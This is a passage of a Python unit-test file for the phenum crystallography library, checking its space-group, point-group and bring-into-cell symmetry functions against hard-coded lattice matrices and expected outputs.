out = ([[[-1.0, 0.0, 0.0], [0.0, -1.0, 0.0], [0.0, 0.0, -1.0]], [[-1.0, 0.0, 0.0], [0.0, 0.0, 1.0], [0.0, 1.0, 0.0]], [[0.0, -1.0, 0.0], [-1.0, 0.0, 0.0], [0.0, 0.0, -1.0]], [[0.0, -1.0, 0.0], [0.0, 0.0, 1.0], [1.0, 0.0, 0.0]], [[0.0, 0.0, -1.0], [0.0, 1.0, 0.0], [-1.0, 0.0, 0.0]], [[0.0, 0.0, -1.0], [1.0, 0.0, 0.0], [0.0, -1.0, 0.0]], [[0.0, 0.0, 1.0], [-1.0, 0.0, 0.0], [0.0, 1.0, 0.0]], [[0.0, 0.0, 1.0], [0.0, -1.0, 0.0], [1.0, 0.0, 0.0]], [[0.0, 1.0, 0.0], [0.0, 0.0, -1.0], [-1.0, 0.0, 0.0]], [[0.0, 1.0, 0.0], [1.0, 0.0, 0.0], [0.0, 0.0, 1.0]], [[1.0, 0.0, 0.0], [0.0, 0.0, -1.0], [0.0, -1.0, 0.0]], [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]], [[0.25, 0.25, 0.75], [0.25, 0.25, 0.75], [0.25, 0.25, 0.75], [0.25, 0.25, 0.75], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.25, 0.25, 0.75], [0.25, 0.25, 0.75], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0]])
self.assertEqual(get_spaceGroup(par_lat,atomType,bas_vecs,eps,lattcoords),out)
def test_7(self):
from phenum.symmetry import get_spaceGroup
par_lat = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
atomType = [1, 1, 1]
bas_vecs = [[0.0, 0.0, 0.0], [0.25, 0.25, 0.75], [0.5, 0.5, 0.25]]
eps = 1e-10
lattcoords = False
out = ([[[0.0, 1.0, 0.0], [1.0, 0.0, 0.0], [0.0, 0.0, 1.0]], [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]], [[0.0, 0.0, 0.0], [0.0, 0.0, 0.0]])
self.assertEqual(get_spaceGroup(par_lat,atomType,bas_vecs,eps,lattcoords),out)
def test_9(self):
from phenum.symmetry import get_spaceGroup
par_lat = [[0.0, 0.5, 0.5], [0.5, 0.5, 0.0], [0.5, 0.0, 0.5]]
atomType = [1]
bas_vecs = [[0.0, 0.0, 0.0]]
eps = 1e-10
lattcoords = False
out = ([[[1.0, 0.0, 0.0], [0.0, -1.0, 0.0], [0.0, 0.0, -1.0]], [[1.0, 0.0, 0.0], [0.0, 0.0, -1.0], [0.0, -1.0, 0.0]], [[-1.0, 0.0, 0.0], [0.0, -1.0, 0.0], [0.0, 0.0, -1.0]], [[-1.0, 0.0, 0.0], [0.0, 0.0, -1.0], [0.0, -1.0, 0.0]], [[0.0, 0.0, -1.0], [0.0, -1.0, 0.0], [1.0, 0.0, 0.0]], [[0.0, 0.0, -1.0], [1.0, 0.0, 0.0], [0.0, -1.0, 0.0]], [[0.0, 0.0, 1.0], [0.0, -1.0, 0.0], [1.0, 0.0, 0.0]], [[0.0, 0.0, 1.0], [1.0, 0.0, 0.0], [0.0, -1.0, 0.0]], [[0.0, -1.0, 0.0], [0.0, 0.0, -1.0], [1.0, 0.0, 0.0]], [[0.0, -1.0, 0.0], [1.0, 0.0, 0.0], [0.0, 0.0, -1.0]], [[0.0, 1.0, 0.0], [0.0, 0.0, -1.0], [1.0, 0.0, 0.0]], [[0.0, 1.0, 0.0], [1.0, 0.0, 0.0], [0.0, 0.0, -1.0]], [[0.0, 0.0, -1.0], [0.0, -1.0, 0.0], [-1.0, 0.0, 0.0]], [[0.0, 0.0, 1.0], [0.0, -1.0, 0.0], [-1.0, 0.0, 0.0]], [[0.0, 0.0, -1.0], [-1.0, 0.0, 0.0], [0.0, -1.0, 0.0]], [[0.0, 0.0, 1.0], [-1.0, 0.0, 0.0], [0.0, -1.0, 0.0]], [[1.0, 0.0, 0.0], [0.0, -1.0, 0.0], [0.0, 0.0, 1.0]], [[-1.0, 0.0, 0.0], [0.0, -1.0, 0.0], [0.0, 0.0, 1.0]], [[1.0, 0.0, 0.0], [0.0, 0.0, 1.0], [0.0, -1.0, 0.0]], [[-1.0, 0.0, 0.0], [0.0, 0.0, 1.0], [0.0, -1.0, 0.0]], [[0.0, -1.0, 0.0], [0.0, 0.0, -1.0], [-1.0, 0.0, 0.0]], [[0.0, -1.0, 0.0], [-1.0, 0.0, 0.0], [0.0, 0.0, -1.0]], [[0.0, 1.0, 0.0], [0.0, 0.0, -1.0], [-1.0, 0.0, 0.0]], [[0.0, 1.0, 0.0], [-1.0, 0.0, 0.0], [0.0, 0.0, -1.0]], [[0.0, -1.0, 0.0], [1.0, 0.0, 0.0], [0.0, 0.0, 1.0]], [[0.0, -1.0, 0.0], [0.0, 0.0, 1.0], [1.0, 0.0, 0.0]], [[0.0, 1.0, 0.0], [1.0, 0.0, 0.0], [0.0, 0.0, 1.0]], [[0.0, 1.0, 0.0], [0.0, 0.0, 1.0], [1.0, 0.0, 0.0]], [[1.0, 0.0, 0.0], [0.0, 0.0, -1.0], [0.0, 1.0, 0.0]], [[-1.0, 0.0, 0.0], [0.0, 0.0, -1.0], [0.0, 1.0, 0.0]], [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, -1.0]], [[-1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, -1.0]], [[0.0, 0.0, -1.0], [1.0, 0.0, 0.0], [0.0, 1.0, 0.0]], [[0.0, 0.0, 1.0], [1.0, 0.0, 0.0], [0.0, 1.0, 0.0]], [[0.0, 0.0, -1.0], [0.0, 1.0, 0.0], [1.0, 0.0, 0.0]], [[0.0, 0.0, 1.0], [0.0, 1.0, 0.0], [1.0, 0.0, 0.0]], [[0.0, -1.0, 0.0], [-1.0, 0.0, 0.0], [0.0, 0.0, 1.0]], [[0.0, -1.0, 0.0], [0.0, 0.0, 1.0], [-1.0, 0.0, 0.0]], [[0.0, 1.0, 0.0], [-1.0, 0.0, 0.0], [0.0, 0.0, 1.0]], [[0.0, 1.0, 0.0], [0.0, 0.0, 1.0], [-1.0, 0.0, 0.0]], [[0.0, 0.0, -1.0], [-1.0, 0.0, 0.0], [0.0, 1.0, 0.0]], [[0.0, 0.0, -1.0], [0.0, 1.0, 0.0], [-1.0, 0.0, 0.0]], [[0.0, 0.0, 1.0], [-1.0, 0.0, 0.0], [0.0, 1.0, 0.0]], [[0.0, 0.0, 1.0], [0.0, 1.0, 0.0], [-1.0, 0.0, 0.0]], [[1.0, 0.0, 0.0], [0.0, 0.0, 1.0], [0.0, 1.0, 0.0]], [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]], [[-1.0, 0.0, 0.0], [0.0, 0.0, 1.0], [0.0, 1.0, 0.0]], [[-1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]], [[0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0]])
self.assertEqual(get_spaceGroup(par_lat,atomType,bas_vecs,eps,lattcoords),out)
def test_getsg11(self):
from phenum.symmetry import get_spaceGroup
case = 1
par_lat = list(map(list,zip(*_read_float_2D(gpath+"get_spaceGroup_aVecs.in."+str(case)))))
atomType = _read_int_1D(gpath+"get_spaceGroup_atomType.in."+str(case))
bas_vecs = list(map(list,zip(*_read_float_2D(gpath+"get_spaceGroup_input_pos.in."+str(case)))))
eps = _read_float(gpath+"get_spaceGroup_eps.in."+str(case))
lattcoords = _read_logical(gpath+"get_spaceGroup_lattcoords.in."+str(case))
out = _read_spaceGroup(case)
ops, fract = get_spaceGroup(par_lat,atomType,bas_vecs,eps,lattcoords)
self._compare_space_group(out,[ops,fract])
def test_getsg12(self):
from phenum.symmetry import get_spaceGroup
case = 2
par_lat = list(map(list,zip(*_read_float_2D(gpath+"get_spaceGroup_aVecs.in."+str(case)))))
atomType = _read_int_1D(gpath+"get_spaceGroup_atomType.in."+str(case))
bas_vecs = list(map(list,zip(*_read_float_2D(gpath+"get_spaceGroup_input_pos.in."+str(case)))))
eps = _read_float(gpath+"get_spaceGroup_eps.in."+str(case))
lattcoords = _read_logical(gpath+"get_spaceGroup_lattcoords.in."+str(case))
out = _read_spaceGroup(case)
ops, fract = get_spaceGroup(par_lat,atomType,bas_vecs,eps,lattcoords)
self._compare_space_group(out,[ops,fract])
def test_getsg13(self):
from phenum.symmetry import get_spaceGroup
case = 3
par_lat = list(map(list,zip(*_read_float_2D(gpath+"get_spaceGroup_aVecs.in."+str(case)))))
atomType = _read_int_1D(gpath+"get_spaceGroup_atomType.in."+str(case))
bas_vecs = list(map(list,zip(*_read_float_2D(gpath+"get_spaceGroup_input_pos.in."+str(case)))))
eps = _read_float(gpath+"get_spaceGroup_eps.in."+str(case))
lattcoords = _read_logical(gpath+"get_spaceGroup_lattcoords.in."+str(case))
out = _read_spaceGroup(case)
ops, fract = get_spaceGroup(par_lat,atomType,bas_vecs,eps,lattcoords)
self._compare_space_group(out,[ops,fract])
def test_getsg14(self):
from phenum.symmetry import get_spaceGroup
case = 4
par_lat = list(map(list,zip(*_read_float_2D(gpath+"get_spaceGroup_aVecs.in."+str(case)))))
atomType = _read_int_1D(gpath+"get_spaceGroup_atomType.in."+str(case))
bas_vecs = list(map(list,zip(*_read_float_2D(gpath+"get_spaceGroup_input_pos.in."+str(case)))))
eps = _read_float(gpath+"get_spaceGroup_eps.in."+str(case))
lattcoords = _read_logical(gpath+"get_spaceGroup_lattcoords.in."+str(case))
out = _read_spaceGroup(case)
ops, fract = get_spaceGroup(par_lat,atomType,bas_vecs,eps,lattcoords)
self._compare_space_group(out,[ops,fract])
def test_getsg15(self):
from phenum.symmetry import get_spaceGroup
case = 5
par_lat = list(map(list,zip(*_read_float_2D(gpath+"get_spaceGroup_aVecs.in."+str(case)))))
atomType = _read_int_1D(gpath+"get_spaceGroup_atomType.in."+str(case))
bas_vecs = list(map(list,zip(*_read_float_2D(gpath+"get_spaceGroup_input_pos.in."+str(case)))))
eps = _read_float(gpath+"get_spaceGroup_eps.in."+str(case))
lattcoords = _read_logical(gpath+"get_spaceGroup_lattcoords.in."+str(case))
out = _read_spaceGroup(case)
ops, fract = get_spaceGroup(par_lat,atomType,bas_vecs,eps,lattcoords)
self._compare_space_group(out,[ops,fract])
def test_getsg16(self):
from phenum.symmetry import get_spaceGroup
case = 6
par_lat = list(map(list,zip(*_read_float_2D(gpath+"get_spaceGroup_aVecs.in."+str(case)))))
atomType = _read_int_1D(gpath+"get_spaceGroup_atomType.in."+str(case))
bas_vecs = list(map(list,zip(*_read_float_2D(gpath+"get_spaceGroup_input_pos.in."+str(case)))))
eps = _read_float(gpath+"get_spaceGroup_eps.in."+str(case))
lattcoords = _read_logical(gpath+"get_spaceGroup_lattcoords.in."+str(case))
out = _read_spaceGroup(case)
ops, fract = get_spaceGroup(par_lat,atomType,bas_vecs,eps,lattcoords)
self._compare_space_group(out,[ops,fract])
def test_getsg17(self):
from phenum.symmetry import get_spaceGroup
case = 7
par_lat = list(map(list,zip(*_read_float_2D(gpath+"get_spaceGroup_aVecs.in."+str(case)))))
atomType = _read_int_1D(gpath+"get_spaceGroup_atomType.in."+str(case))
bas_vecs = list(map(list,zip(*_read_float_2D(gpath+"get_spaceGroup_input_pos.in."+str(case)))))
eps = _read_float(gpath+"get_spaceGroup_eps.in."+str(case))
lattcoords = _read_logical(gpath+"get_spaceGroup_lattcoords.in."+str(case))
out = _read_spaceGroup(case)
ops, fract = get_spaceGroup(par_lat,atomType,bas_vecs,eps=eps,lattcoords=lattcoords)
self._compare_space_group(out,[ops,fract])
def test_getsg18(self):
from phenum.symmetry import get_spaceGroup
case = 8
par_lat = list(map(list,zip(*_read_float_2D(gpath+"get_spaceGroup_aVecs.in."+str(case)))))
atomType = _read_int_1D(gpath+"get_spaceGroup_atomType.in."+str(case))
bas_vecs = list(map(list,zip(*_read_float_2D(gpath+"get_spaceGroup_input_pos.in."+str(case)))))
eps = _read_float(gpath+"get_spaceGroup_eps.in."+str(case))
lattcoords = _read_logical(gpath+"get_spaceGroup_lattcoords.in."+str(case))
out = _read_spaceGroup(case)
ops, fract = get_spaceGroup(par_lat,atomType,bas_vecs,eps,lattcoords)
self._compare_space_group(out,[ops,fract])
def test_getsg19(self):
from phenum.symmetry import get_spaceGroup
case = 9
par_lat = list(map(list,zip(*_read_float_2D(gpath+"get_spaceGroup_aVecs.in."+str(case)))))
atomType = _read_int_1D(gpath+"get_spaceGroup_atomType.in."+str(case))
bas_vecs = list(map(list,zip(*_read_float_2D(gpath+"get_spaceGroup_input_pos.in."+str(case)))))
eps = _read_float(gpath+"get_spaceGroup_eps.in."+str(case))
lattcoords = _read_logical(gpath+"get_spaceGroup_lattcoords.in."+str(case))
out = _read_spaceGroup(case)
ops, fract = get_spaceGroup(par_lat,atomType,bas_vecs,eps,lattcoords)
self._compare_space_group(out,[ops,fract])
def test_getsg20(self):
from phenum.symmetry import get_spaceGroup
from numpy.testing import assert_allclose
from numpy import array
case = 10
par_lat = list(map(list,zip(*_read_float_2D(gpath+"get_spaceGroup_aVecs.in."+str(case)))))
atomType = _read_int_1D(gpath+"get_spaceGroup_atomType.in."+str(case))
bas_vecs = list(map(list,zip(*_read_float_2D(gpath+"get_spaceGroup_input_pos.in."+str(case)))))
eps = _read_float(gpath+"get_spaceGroup_eps.in."+str(case))
lattcoords = _read_logical(gpath+"get_spaceGroup_lattcoords.in."+str(case))
out = _read_spaceGroup(case)
ops, fract = get_spaceGroup(par_lat,atomType,bas_vecs,eps,lattcoords)
self._compare_space_group(out,[ops,fract])
def test_getsg21(self):
from phenum.symmetry import get_spaceGroup, _get_transformations
par_lat = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
(prim_to_cart, cart_to_prim) = _get_transformations(par_lat)
atomType = [1, 1, 1]
bas_vecs = [[0.0, 0.0, 0.0], [0.25, 0.25, 0.75], [0.5, 0.5, 0.25]]
bas_vecs = [np.matmul(cart_to_prim, i).tolist() for i in bas_vecs]
eps = 1e-10
lattcoords = True
out = ([[[0.0, 1.0, 0.0], [1.0, 0.0, 0.0], [0.0, 0.0, 1.0]], [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]], [[0.0, 0.0, 0.0], [0.0, 0.0, 0.0]])
self.assertEqual(get_spaceGroup(par_lat,atomType,bas_vecs,eps,lattcoords),out)
class TestBringIntoCell(ut.TestCase):
"""Tests of the bring_into_cell subroutine."""
def test_1(self):
from phenum.symmetry import bring_into_cell
bas_vecs = [0.0, 0.0, 0.0]
cart_to_latt = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
latt_to_cart = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
eps = 1e-10
out = [0.0, 0.0, 0.0]
self.assertEqual(bring_into_cell(bas_vecs,cart_to_latt,latt_to_cart,eps),out)
def test_2(self):
from phenum.symmetry import bring_into_cell
bas_vecs = [0.0, 0.0, 0.0]
cart_to_latt = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
latt_to_cart = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
eps = 1e-10
out = [0.0, 0.0, 0.0]
self.assertEqual(bring_into_cell(bas_vecs,cart_to_latt,latt_to_cart,eps),out)
def test_3(self):
from phenum.symmetry import bring_into_cell
bas_vecs = [0.0, 0.0, 0.0]
cart_to_latt = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
latt_to_cart = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
eps = 1e-10
out = [0.0, 0.0, 0.0]
self.assertEqual(bring_into_cell(bas_vecs,cart_to_latt,latt_to_cart,eps),out)
def test_4(self):
from phenum.symmetry import bring_into_cell
bas_vecs = [0.0, 0.0, 0.0]
cart_to_latt = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
latt_to_cart = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
eps = 1e-10
out = [0.0, 0.0, 0.0]
self.assertEqual(bring_into_cell(bas_vecs,cart_to_latt,latt_to_cart,eps),out)
def test_5(self):
from phenum.symmetry import bring_into_cell
bas_vecs = [0.0, 0.0, 0.0]
cart_to_latt = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
latt_to_cart = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
eps = 1e-10
out = [0.0, 0.0, 0.0]
self.assertEqual(bring_into_cell(bas_vecs,cart_to_latt,latt_to_cart,eps),out)
def test_6(self):
from phenum.symmetry import bring_into_cell
bas_vecs = [0.25, 0.25, 0.75]
cart_to_latt = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
latt_to_cart = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
eps = 1e-10
out = [0.25, 0.25, 0.75]
self.assertEqual(bring_into_cell(bas_vecs,cart_to_latt,latt_to_cart,eps),out)
def test_7(self):
from phenum.symmetry import bring_into_cell
bas_vecs = [0.0, 0.0, 0.0]
cart_to_latt = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
latt_to_cart = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
eps = 1e-10
out = [0.0, 0.0, 0.0]
self.assertEqual(bring_into_cell(bas_vecs,cart_to_latt,latt_to_cart,eps),out)
def test_8(self):
from phenum.symmetry import bring_into_cell
bas_vecs = [0.25, 0.25, 0.75]
cart_to_latt = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
latt_to_cart = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
eps = 1e-10
out = [0.25, 0.25, 0.75]
self.assertEqual(bring_into_cell(bas_vecs,cart_to_latt,latt_to_cart,eps),out)
def test_9(self):
from phenum.symmetry import bring_into_cell
bas_vecs = [0.0, 0.0, 0.0]
cart_to_latt = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
latt_to_cart = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
eps = 1e-10
out = [0.0, 0.0, 0.0]
self.assertEqual(bring_into_cell(bas_vecs,cart_to_latt,latt_to_cart,eps),out)
def test_10(self):
from phenum.symmetry import bring_into_cell
bas_vecs = [0.25, 0.25, 0.75]
cart_to_latt = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
latt_to_cart = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
eps = 1e-10
out = [0.25, 0.25, 0.75]
self.assertEqual(bring_into_cell(bas_vecs,cart_to_latt,latt_to_cart,eps),out)
def test_11(self):
from phenum.symmetry import bring_into_cell
bas_vecs = [0.5, 0.5, 0.25]
cart_to_latt = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
latt_to_cart = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
eps = 1e-10
out = [0.5, 0.5, 0.25]
self.assertEqual(bring_into_cell(bas_vecs,cart_to_latt,latt_to_cart,eps),out)
def test_11(self):
from phenum.symmetry import bring_into_cell
bas_vecs = [0.0, 0.0, 0.0]
cart_to_latt = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
latt_to_cart = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
eps = 1e-10
out = [0.0, 0.0, 0.0]
self.assertEqual(bring_into_cell(bas_vecs,cart_to_latt,latt_to_cart,eps),out)
def test_12(self):
from phenum.symmetry import bring_into_cell
bas_vecs = [0.25, 0.25, 0.75]
cart_to_latt = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
latt_to_cart = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
eps = 1e-10
out = [0.25, 0.25, 0.75]
self.assertEqual(bring_into_cell(bas_vecs,cart_to_latt,latt_to_cart,eps),out)
def test_13(self):
from phenum.symmetry import bring_into_cell
bas_vecs = [0.5, 0.5, 0.25]
cart_to_latt = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
latt_to_cart = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
eps = 1e-10
out = [0.5, 0.5, 0.25]
self.assertEqual(bring_into_cell(bas_vecs,cart_to_latt,latt_to_cart,eps),out)
def test_14(self):
from phenum.symmetry import bring_into_cell
bas_vecs = [0.0, 0.0, 0.0]
cart_to_latt = [[-1.0, 1.0, 1.0], [1.0, 1.0, -1.0], [1.0, -1.0, 1.0]]
latt_to_cart = [[0.0, 0.5, 0.5], [0.5, 0.5, 0.0], [0.5, 0.0, 0.5]]
eps = 1e-10
out = [0.0, 0.0, 0.0]
self.assertEqual(bring_into_cell(bas_vecs,cart_to_latt,latt_to_cart,eps),out)
def test_15(self):
from phenum.symmetry import bring_into_cell
bas_vecs = [0.0, 0.0, 0.0]
cart_to_latt = [[-1.0, 1.0, 1.0], [1.0, 1.0, -1.0], [1.0, -1.0, 1.0]]
latt_to_cart = [[0.0, 0.5, 0.5], [0.5, 0.5, 0.0], [0.5, 0.0, 0.5]]
eps = 1e-10
out = [0.0, 0.0, 0.0]
self.assertEqual(bring_into_cell(bas_vecs,cart_to_latt,latt_to_cart,eps),out)
def test_16(self):
from phenum.symmetry import bring_into_cell
bas_vecs = [1.0,0.0,1.0]
cart_to_latt = np.transpose([[1.0, -1.0, 0.1], [1.0, 1.0, -0.1], [-1.0, 1.0, 0.1]])
latt_to_cart = np.transpose([[0.5, 0.5, 0.0], [0.0, 0.5, 0.5], [5.0, 0.0, 5.0]])
eps = 1e-3
out = [1.0,0.0,1.0]
self.assertEqual(bring_into_cell(bas_vecs,cart_to_latt,latt_to_cart,eps),out)
def test_17(self):
from phenum.symmetry import bring_into_cell
bas_vecs = [2.0,0.0,2.0]
cart_to_latt = np.transpose([[1.0, -1.0, 0.1], [1.0, 1.0, -0.1], [-1.0, 1.0, 0.1]])
latt_to_cart = np.transpose([[0.5, 0.5, 0.0], [0.0, 0.5, 0.5], [5.0, 0.0, 5.0]])
eps = 1e-3
out = [2.0,0.0,2.0]
self.assertEqual(bring_into_cell(bas_vecs,cart_to_latt,latt_to_cart,eps),out)
def test_18(self):
from phenum.symmetry import bring_into_cell
bas_vecs = [3.0,0.0,3.0]
cart_to_latt = np.transpose([[1.0, -1.0, 0.1], [1.0, 1.0, -0.1], [-1.0, 1.0, 0.1]])
latt_to_cart = np.transpose([[0.5, 0.5, 0.0], [0.0, 0.5, 0.5], [5.0, 0.0, 5.0]])
eps = 1e-3
out = [3.0000000000000004, 0.0, 3.0000000000000004]
self.assertEqual(bring_into_cell(bas_vecs,cart_to_latt,latt_to_cart,eps),out)
def test_19(self):
from phenum.symmetry import bring_into_cell
bas_vecs = [0.0, 0.5779502399999998, 1.6329931599999998]
cart_to_latt = np.transpose([[1.0, 0.0, 0.0], [-0.5773502717125849, 1.1547005434251698, 0.0], [0.0, 0.0, 0.6123724213915893]])
latt_to_cart = np.transpose([[1.0, 0.0, 0.0], [0.5, 0.8660254, 0.0], [0.0, 0.0, 1.6329932]])
eps = 1e-3
out = [1.0000000000000000, 0.57795023999999980, -4.0000000416390380E-008]
self.assertEqual(bring_into_cell(bas_vecs,cart_to_latt,latt_to_cart,eps),out)
class TestGetLatticePointGroup(ut.TestCase):
def test_getpg1(self):
from phenum.symmetry import get_lattice_pointGroup
avecs = [[1,1,0],[1,0,1],[0,1,1]]
eps = 1E-6
out = _read_pg(gpath+"fcc_pg.out")
pg = get_lattice_pointGroup(avecs,eps)
present = []
for p in pg:
for g in out:
if np.allclose(p,g):
present.append(True)
self.assertEqual(len(out),len(present))
def test_getpg2(self):
from phenum.symmetry import get_lattice_pointGroup
avecs = [[1,0,0],[0.5,-0.86602540378444,0],[0,0,2]]
eps = 1E-6
out = _read_pg(gpath+"hex_pg.out")
pg = get_lattice_pointGroup(avecs,eps)
present = []
for p in pg:
for g in out:
if np.allclose(p,g):
present.append(True)
self.assertEqual(len(out),len(present))
def test_getpg3(self):
from phenum.symmetry import get_lattice_pointGroup
avecs = [[1,0,0],[0,1,0],[0,0,1]]
eps = 1E-6
out = _read_pg(gpath+"sc_pg.out")
pg = get_lattice_pointGroup(avecs,eps)
present = []
for p in pg:
for g in out:
if np.allclose(p,g):
present.append(True)
self.assertEqual(len(out),len(present))
def test_getpg4(self):
from phenum.symmetry import get_lattice_pointGroup
avecs = [[1,-1,1],[-1,1,1],[1,1,-1]]
eps = 1E-6
out = _read_pg(gpath+"bcc_pg.out")
pg = get_lattice_pointGroup(avecs,eps)
present = []
for p in pg:
for g in out:
if np.allclose(p,g):
present.append(True)
self.assertEqual(len(out),len(present))
def test_getpg5(self):
from phenum.symmetry import get_lattice_pointGroup
avecs = [[1,2,2],[2,1,2],[2,2,1]]
eps = 1E-6
out = _read_pg(gpath+"trig_pg.out")
pg = get_lattice_pointGroup(avecs,eps)
present = []
for p in pg:
for g in out:
if np.allclose(p,g):
present.append(True)
self.assertEqual(len(out),len(present))
def test_getpg6(self):
from phenum.symmetry import get_lattice_pointGroup
avecs = [[1,0,0],[0.15,1,0],[0.25,0,1]]
eps = 1E-6
out = _read_pg(gpath+"tric_pg.out")
pg = get_lattice_pointGroup(avecs,eps)
present = []
for p in pg:
for g in out:
if np.allclose(p,g):
present.append(True)
self.assertEqual(len(out),len(present))
def test_getpg7(self):
from phenum.symmetry import get_lattice_pointGroup
avecs = [[1,0,0],[0,1,0],[0,0,2]]
eps = 1E-6
out = _read_pg(gpath+"st_pg.out")
pg = get_lattice_pointGroup(avecs,eps)
present = []
for p in pg:
for g in out:
if np.allclose(p,g):
present.append(True)
self.assertEqual(len(out),len(present))
def test_getpg8(self):
from phenum.symmetry import get_lattice_pointGroup
avecs = [[-0.5,0.5,1],[0.5,-0.5,1],[0.5,0.5,-1]]
eps = 1E-6
out = _read_pg(gpath+"bct_pg.out")
pg = get_lattice_pointGroup(avecs,eps)
present = []
for p in pg:
for g in out:
if np.allclose(p,g):
present.append(True)
self.assertEqual(len(out),len(present))
def test_getpg9(self):
from phenum.symmetry import get_lattice_pointGroup
avecs = [[1,0,0],[0,2,0],[0,0,3]]
eps = 1E-6
out = _read_pg(gpath+"so_pg.out")
pg = get_lattice_pointGroup(avecs,eps)
present = []
for p in pg:
for g in out:
if np.allclose(p,g):
present.append(True)
self.assertEqual(len(out),len(present))
def test_getpg10(self):
from phenum.symmetry import get_lattice_pointGroup
avecs = [[0.5,1,0],[0.5,-1,0],[0,0,3]]
eps = 1E-6
out = _read_pg(gpath+"cco_pg.out")
pg = get_lattice_pointGroup(avecs,eps)
present = []
for p in pg:
for g in out:
if np.allclose(p,g):
present.append(True)
self.assertEqual(len(out),len(present))
def test_getpg11(self):
from phenum.symmetry import get_lattice_pointGroup
avecs = [[-0.5,1,1.5],[0.5,-1,1.5],[0.5,1,-1.5]]
eps = 1E-6
out = _read_pg(gpath+"bco_pg.out")
pg = get_lattice_pointGroup(avecs,eps)
present = []
for p in pg:
for g in out:
if np.allclose(p,g):
present.append(True)
self.assertEqual(len(out),len(present))
def test_getpg13(self):
from phenum.symmetry import get_lattice_pointGroup
avecs = [[0.5,1,0],[0.5,0,1.5],[0,1,1.5]]
eps = 1E-6
out = _read_pg(gpath+"fco_pg.out")
pg = get_lattice_pointGroup(avecs,eps)
present = []
for p in pg:
for g in out:
if np.allclose(p,g):
present.append(True)
self.assertEqual(len(out),len(present))
def test_getpg14(self):
from phenum.symmetry import get_lattice_pointGroup
